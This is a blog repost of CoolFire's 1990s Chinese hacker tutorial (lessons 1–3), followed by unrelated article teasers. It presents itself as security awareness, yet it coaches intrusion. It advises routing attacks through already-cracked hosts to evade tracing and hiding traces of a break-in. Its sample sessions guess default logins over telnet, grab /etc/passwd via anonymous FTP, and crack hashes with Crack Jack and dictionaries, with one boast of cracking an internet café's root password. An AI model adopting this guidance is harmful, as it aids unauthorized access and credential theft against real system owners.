CoolFire系列讲座 第1讲_gxhlh的博客-程序员宝宝_系列讲座 告诉你

作者:CoolFire [[email protected]] (2001-10-12 15:00:00)
CoolHC Volume 1 By CoolFire Author E-Mail: [email protected]

林正隆,中国台湾著名黑客,中国黑客领军人物。2011年获得COG信息安全终身成就奖
林正隆-百度百科

说明:本系列文章是整理Coolfire的8篇黑客入门文章,因在浏览网上相关文章的时候,要么残缺不全,要么文章排版极乱,阅读体验极差,为了获得更好的阅读体验故而做此整理。

这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑黑客们是如何入侵你的电脑, 我是CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !!

1、甚么是 Hacking ?

就是入侵电脑! 有甚么好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人… 破坏… 唉! 一大堆怪解释就是了, 最好不要成为一个 “骇客”, 我… 不是!

2、为甚么要 Hack ?

我们只是为了要解更多关於系统的技术, 入侵它,了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作 !! 为了安全性而作革命!

3、Hack 守则

  1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦.恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料 !!
  2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状.
  3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友.
  4. 不要在 bbs 上谈论你 Hack 的任何事情.
  5. 在 Post 文章的时候不要使用真名.
  6. 正在入侵的时候, 不要随意离开你的电脑.
  7. 不要侵入或破坏政府机关的主机.
  8. 不在电话中谈论你 Hack 的任何事情.
  9. 将你的笔记放在安全的地方.
  10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)!
  11. 已侵入电脑中的帐号不得清除或修改.
  12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !!
  13. 不将你已破解的帐号分享与你的朋友.

4、破解之道

  1. 进入主机中
  2. 得到 /etc/passwd
  3. 得到系统帐号
  4. 得到最高权限

How 1.

进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要 “进入” 该主机, 这些 Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚么??? 我不知道, 你知道吗?!

底下的示范并不是像写出来的那么容易, 只不过是要让你 解如何进入, 当然其中还有很多问题, 如打错指令… 等等的毛病… 没有出现在课堂上, 但是我为了面子… 一定要删掉这些不堪入目的东西嘛…

示范进入主机的方法: (By CoolFire)

(首先要先连上某一台你已经有帐号的 Telnet 主机, 当然最好是假的, 也就是 Crack过的主机, 然後利用它来 Crack 别的主机, 才不会被别人以逆流法查出你的所在)

Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec   2 03:24:00 from 255.255.0.0

(我用的是 ms.hinet.net … 当然是假的罗, 都已经经过修改了啦 !!没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名称, 请同学们要记得 !!)

Digital UNIX V1.2C   (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯… 进来了 ! 开始攻击吧 ! 本次的目标是…)

ms.hinet.net> telnet www.fuckyou.hinet.net    (Telnet 试试看....)
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(没关系, 再来 !!)

cool login: hinet
Password:
Login incorrect
cool login:

(都没猜对, 这边用的是 猜 的方法, 今天运气好像不好)

telnet> close
Connection closed.

(重来, 换个 Port 试试看 !!)

ms.hinet.net> telnet 111.222.255.255 80
Trying 111.222.255.255...
Connected to 111.222.255.255.
Escape character is '^]'.
<HTML>
<HEAD>
<TITLE>Error</TITLE>
</HEAD>
<BODY>
<H1>Error 400</H1>
Invalid request "" (unknown method)
<P><HR><ADDRESS><A HREF="http://www.w3.org">CERN-HTTPD 3.0A</A></ADDRESS>
</BODY>
</HTML>
Connection closed by foreign host.

(哇哩 !! 连密码都没得输入, 真是… 再来 !! 要有恒心 !!)
(换 FTP Port 试试)

ms.hinet.net> ftp 111.222.255.255
Connected to 111.222.255.255.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (111.222.255.255:FakeName): anonymous
331 Guest login ok, send your complete e-mail address as password.
Password:
230-Welcome, archive user!   This is an experimental FTP server.   If have any
230-unusual problems, please report them via e-mail to [email protected].com
230-If you do have problems, please try using a dash (-) as the first character
230-of your password -- this will turn off the continuation messages that may
230-be confusing your ftp client.
230-
230 Guest login ok, access restrictions apply.
Remote system type is UNIX.
Using binary mode to transfer files.

(哇 ! 可以用 anonymous 进来耶!! password 部份输入 [email protected] 就好了 !不要留下足迹喔!!)

ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for file list.
etc
pub
usr
bin
lib
incoming
welcome.msg
226 Transfer complete.

(嗯嗯… 太好了 ! 进来了 !! 下一个目标是…)

ftp> cd etc
250 CWD command successful.
ftp> get passwd          (抓回来 !!)
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (566 bytes).
226 Transfer complete.
566 bytes received in 0.56 seconds (0.93 Kbytes/s)

(喔… 这么容易吗??)

ftp> !cat passwd       (看看 !!!)
root::0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:
daemon:*:2:2:daemon:/sbin:
adm:*:3:4:adm:/var/adm:
lp:*:4:7:lp:/var/spool/lpd:
sync:*:5:0:sync:/sbin:/bin/sync
shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown
halt:*:7:0:halt:/sbin:/sbin/halt
mail:*:8:12:mail:/var/spool/mail:
news:*:9:13:news:/var/spool/news:
uucp:*:10:14:uucp:/var/spool/uucp:
operator:*:11:0:operator:/root:/bin/bash
games:*:12:100:games:/usr/games:
man:*:13:15:man:/usr/man:
postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash
ftp:*:404:1::/home/ftp:/bin/bash

(哇哩… 是 Shadow 的… 真是出师不利… )

ftp> bye
221 Goodbye.

(不信邪… 还是老话, 要有恒心…)
(FTP 不行, 再 Telnet 看看 !!)

ms.hinet.net> telnet www.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect

(又猜错 !!)

cool login: fuckyou
Password:
Last login: Mon Dec   2 09:20:07 from 205.11.122.12
Linux 1.2.13.
Some programming languages manage to absorb change but withstand
progress.
cool:~$  

(哇哈哈 !! 哪个笨 root, 用 system name 作 username 连password 也是 system name… 总算… 没白玩…)

cool:~$ system
bash: system: command not found

(嗯… 这个 user 的权限好像不大…)

cool:~$ ls
cool:~$ pwd
/home/fuckyou
cool:~$ cd /
cool:/$ ls
Public/       cdrom/        lib/          mnt/          tmp/          www/
README        dev/          linux*        proc/         usr/
bin/          etc/          local/        root/         var/
boot/         home/         lost+found/   sbin/         
cool:/$ cd etc
telnet> quit

(好想睡呀 !! 不玩了 !! 下节课再开始…)

Connection closed.
ms.hinet.net> exit

(走了 !! 下节课在见啦 !! 今天就上到这里 ! 老师要先下班了 !!)
(有学生说: 骗人! 还没有破解呀!! 胡说 ! 不是已经进来了吗 ???看看这节课上的是甚么??? ---->进入主机 !! 嗯…)


How 2.

上节课抓回来一个 “乱七八糟” 的 /etc/passwd, 你以为我的真那么笨吗?? guest 所抓回来的能是甚么好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经 “猜” 到了一个不是 guest 的 username 及 password. 今天就以它来进入主机瞧瞧 !!

Digital UNIX (ms.hinet.net) (ttypa)
login: FakeName
Password:
Last login: Mon Dec   2 03:24:00 from 255.255.0.0
Digital UNIX V1.2C   (Rev. 248); Mon Oct 31 21:23:02 CST 1996
Digital UNIX V1.2C Worksystem Software (Rev. 248)
Digital UNIX Chinese Support V1.2C (rev. 3)

(嗯… 进来了 ! 开始攻击吧 ! 本次的目标是…呵…)

ms.hinet.net> telnet cool.fuckyou.hinet.net    (Telnet 试试看.... 昨天的位址, 有作笔记吧!)
stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net
Trying 111.222.255.255...
Connected to cool.fuckyou.hinet.net.
Escape character is '^]'.
Password:
Login incorrect
cool login: fuckyou
Password:              (一样输入 fuckyou)
Last login: Mon Dec   1 12:44:10 from ms.hinet.net
Linux 1.2.13.
cool:~$ cd /etc
cool:/etc$ ls
DIR_COLORS          ftpusers            localtime           resolv.conf
HOSTNAME            gateways            magic               rpc
NETWORKING          group               mail.rc             securetty
NNTP_INEWS_DOMAIN   host.conf           motd                sendmail.cf
[email protected]                hosts               messages/               sendmail.st
XF86Config          hosts.allow         mtab                services
at.deny             hosts.deny          mtools              shells
bootptab            hosts.equiv         named.boot          shutdownp
csh.cshrc           hosts.lpd           networks            snoopy/
csh.login           httpd.conf          nntpserver          slip.hosts
exports             inetd.conf          passwd              snooptab
fastboot            inittab             passwd.OLD          syslog.conf
fdprm               issue               passwd.old          syslog.pid
fstab               ld.so.cache         printcap            ttys
ftpaccess           ld.so.conf          profile             [email protected]

(找寻目标… 太乱了 ! 懒得找, 再来 …)

cool:/etc$ ls pa*
passwd       passwd.OLD   passwd.old

(果然在)

cool:/etc$ more passwd

(看看有没有 Shadow…)

root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(正点 ! 一点都没有防备 !!)

cool:/etc$ exit
logout

(走了!.. 换 FTP 上场 !!)

Connection closed by foreign host.
ms.hinet.net> ftp www.fuckyou.hinet.net
Connected to cool.fuckyou.hinet.net.
220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready.
Name (www.fuckyou.hinet.net:66126): fuckyou
331 Password required for fuckyou.
Password:
230 User fuckyou logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd /etc
250 CWD command successful.
ftp> get passwd
200 PORT command successful.
150 Opening BINARY mode data connection for passwd (350 bytes).
226 Transfer complete.
350 bytes received in 0.68 seconds (1.9 Kbytes/s)
ftp> !cat passwd
root:acqQkJ2LoYp:0:0:root:/root:/bin/bash
john:234ab56:9999:13:John Smith:/home/john:/bin/john

(看看 ! 呵 ! 假不了 !!..)

ftp> bye
221 Goodbye.
ms.hinet.net> exit

(闪人罗 !! 下课 !!.. 喔慢点, 还有事要说明…)
passwd 的 Shadow 就是把 passwd 放在 shadow 档中, 而你原先在第一节课所看到的这个格式的 passwd 并不是真正的 passwd…
root::0:0:root:/root:/bin/bash
因为密码的部份没有东西… 所以拿了也没有用 !! 但这一节课所拿到的东西呢,像是这样, 有几点需要说明的, 就是它究竟代表著甚么???

john:234ab56:9999:13:John Smith:/home/john:/bin/sh

它以 “:” 分成几个栏位, 各栏位对照如下:

User Name: john
Password:234ab56
User No: 9999
Group No: 13
Real Name: John Smith
Home Dir: /home/john
Shell: /bin/sh

了吧 ! 了吧 ! 保留著你千辛万苦所拿到的 passwd, 咱们第三节课再来告诉各位如何使用 Crack Jack 把 passwd 解码… 呵呵… zzZZzZzz…


HOW3.

Crack Jack V1.4 中文使用说明 (By CoolFire 12-1-1996)

嗯… 该到第三课了 !! 累了的同学先去喝口水吧!这一节课咱们来说说 Crack Jack ! 这可是个解读 /etc/passwd 的好工具喔, 不要告诉我你习惯用 Brute, 拿 Brute 跟 Crack Jack 的速度比比看, 包准你马上投向 Crack Jack 1.4 的怀抱, 但请先确定你所使用的是 Crack Jack 1.4, 你可以在 CoolFire 的 Hacker&Mailer Page 中拿到这个版本的 Crack Jack ! 这才是真正有用的版本, 速度… 对… 就是这点别人都比不上 ! 但还是要讲讲它的缺点… 就是只能在 DOS 跟 OS2 中跑, 如果在 Windoz 95 上开个 DOS Mode 跑, 它可是连理都不会理你的 !

OK! 现在切入正题 ! etc/passwd 拿到手了吧 !! 开始罗 !! 使用 Crack Jack 1.4 前所需要的东西有这些 [1] Crack Jack 1.4 (废话…$%^&@@) [2] /etc/passwd 档案, 你可以在 Unix 系统中的 /etc/ 目录中找到 passwd [3] 字典档 (哪里找, 自己敲… 呵 ClayMore 中有一份 DIC.TXT是有一千多个字的字典, 但比起我的字典可就小巫见大巫了, LetMeIn! 1.0 里面也有, 听 James
说 2.0 Release 的时候会有更棒的字典档含入, 期待吧!)… 使用 Crack Jack 1.4 前需先确定你所使用的机器是 386 含以上 CPU 的 ! 然後最好有充足的记忆体 !!

开始 Jack 时只要敲入 JACK 即可, 它会问你 PW Name… 输入你的 passwd 档名, DictionaryName 输入你的字典档名, Jack 就会开始找了 ! 找到时会告诉你, 也会在 JACK.POT 中写入它所找到的密码 !! 但… 有点怪的格式! 如果找到的是具 root 权限的密码, Jack 会告诉你 This isJackAss… 嗯…说脏话了 !! 因为使用 Jack 占用的时间实在太多, 如果你中途想要停掉时只要
按下 Ctrl-C 即可, 别以为你前功尽弃了! 因为 Jack 有个 Restore 的功能, 中断时会自动存档为 RESTORE, 下次要继续这次的寻找只要输入 Jack -Restore:RESTORE 即可 !! 当然你也可以为你的 Restore 重新命名 ! Jack 也会找得到的 … 如 Ren restore restore.HNT 之後要再寻找的时後就 Jack -Restore:RESTORE.HNT 即可… Jack 会很自动的 Restore 前次所寻找的字串…继续帮你找下去…

字典档哪里找: 我的不给你! 可以找别的 Brute Force 之类的程式, 有些里面会附, 或是找找其它的 Hacker 地下站看看有没有, 自己编一个, 或找个英汉字典软体将字典的部份解出来, 可能要有一点资料栏位及写程式的基础.

[这一节课没有范例] 成功的案例: 找到过某家网路咖啡店的 root 权限密码 ! Jack 好正点呀 !!!所花的时间: 20 分钟左右… 但也有找了一两天也找不到的… 呜… 骇客们! 加油吧 !!

继续

继续阅读:

版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44721831/article/details/104277839

智能推荐

volley加载图片 及imageloader使用_Android界的小蚂蚁的博客-程序员宝宝

xml文件<?xml version="1.0" encoding="utf-8"?><LinearLayout xmlns:android="http://schemas.android.com/apk/res/android" xmlns:tools="http://schemas.android.com/tools" android:layout_width="mat

CPU中的程序是怎么运行起来的_公众号:肉眼品世界的博客-程序员宝宝

总述最近一位朋友问我,开发的代码是怎么在芯片运行起来的,我就开始给他介绍代码的预编译、汇编、编译、链接然后到一般的文件属性,再到代码运行。但是大佬问了我一句,CPU到底是怎么执行...

Python3.6.0编译.exe文件(这样编译成的.exe文件比较大)_归顺自然的博客-程序员宝宝_3.6.0.exe.zip

使用命令:pip install pyinstaller或者更新:pip install --upgrade pyinstaller或者下载压缩包:pip install https://github.com/pyinstaller/pyinstaller/releases/download/v3.4/PyInstaller-3.4.tar.gz例如桌面有个文件:XX...

计蒜客暑假集训第一阶段第5场 c题_一枚研究生er的博客-程序员宝宝

John loves winter. Every skiing season he goes heli-skiing with his friends. To do so, they rent a helicopter that flies them directly to any mountain in the Alps. From there they follow the picturesq...

中职生计算机基础教材105页,中职计算机基础 (105)(121页)-原创力文档_牡丹一抹红的博客-程序员宝宝

..大学计算机基础 试题题库及答案一、单选题练习1.完整的计算机系统由( C )组成。A .运算器、控制器、存储器、输入设备和输出设备B.主机和外部设备C.硬件系统和软件系统D .主机箱、显示器、键盘、鼠标、打印机2 .以下软件中,( D )不是操作系统软件。A .Windows xp B.unix C .linux D .mic...

【ORACLE_环境】ORACLE 10G中安装RAC-含图解(五)_zyjj_530的博客-程序员宝宝

《【ORACLE_环境】ORACLE 10G中安装RAC-含图解(四)》,地址:http://blog.csdn.net/zyjj_530/article/details/74345844.11 配置ASM1.   使用ORACLE用户进入$ORACLE_HOME/bin目录下使用dbca创建ASM选择集群数据库配置: 2.  点击“Next”,选择配置ASM

随便推点

Android go 自定义静态广播接收不到的问题_lyl0530的博客-程序员宝宝

1. 清单文件&amp;lt;manifest xmlns:android=&quot;http://schemas.android.com/apk/res/android&quot; xmlns:androidprv=&quot;http://schemas.android.com/apk/prv/res/android&quot; package=&quot;com.android.phone&quot; cor...

git submodule解决多包协作_懒得幽默的老四的博客-程序员宝宝_monorepo submodule

git submodule解决多包协作项目背景解决方案monoreposubmodule常用命令如何使用克隆已有字模块项目为现有项目添加子模块仓库修改子模块删除子模块项目背景当项目A开发到一定量级之后,往往需要将多个子模块进行拆分,我们希望各个子模块独立,减小相互间的影响。同时有需求需要在这个项目的基础上,另起一个项目B,将部分功能剔除,A和B交集的功能需要同步更新。拆分之后,我们会面临如下问题:如何处理子模块的依赖依赖更新后同步的问题解决方案monorepo首先我们想到的是采用monor

Ogre手动绘制立方体以及添加材质_weixin_30511107的博客-程序员宝宝

转载,嗯,原始不知道是谁了,不管了,我看的也是转的。1.用Ogre来绘制一个立方体ManualObject* cube;cube = mSceneMgr-&gt;createManualObject("cube");cube-&gt;begin("cubeMaterial"); // 顶点 cube-&gt;position( -100, -100, -10...

HTC Desire G7刷机_iteye_18922的博客-程序员宝宝

HTC Desire G7刷机 2011年10月07日  相关帖子:  1,[教程]G7刷机详细教程:解锁S-OFF,ROOT提取,CM-7.0.3ROM刷机 ---&gt; 本帖  2,[教程]Android手机上如何无痛替换SD卡,扩展存储空间   3,[教程]Android手机上如何实现data2ext  4,[文章]磁盘的逻辑构造(参见: wenku.baid...

yocto中的init manager_LeoSoldOut的博客-程序员宝宝_yocto packagegroup

前言根据前文Linux根文件系统挂载流程中的分析,内核通过调用根文件系统中的init程序跳转到用户空间,并对用户空间所需的基础框架进行初始化。类比于内核启动时,需要对各个功能模块初始化进行初始化,当进入用户空间时,也需要启动各项服务来搭建基础的应用环境。对于不同的init系统管理器,服务启动的方式有所区别,下文主要对yocto中使用的sysVinit、busybox init和systemd进行...

《给初学者的Windows Vista的补遗手册》之075_mengtech的博客-程序员宝宝_pp-humanseg ncnn

4.2. 从开始菜单搜索 从打开开始菜单开始吧,不管你是点击开始按钮,还是按Windows键。 开始搜索文本框会出现在开始菜单的底部,你可以立即开始输入来寻找你要找到并打开的文件(图4-1)。例如,如果你正想要找到一个唤作“Lucien Chiong.doc”的文件,输入“Luci”或“Chi”就能很好地工作。 当你输入的时候,你熟悉的开始菜单项会消失不见,并被搜索结果取代。这种搜索是一种即时的、

推荐文章

热门文章

相关标签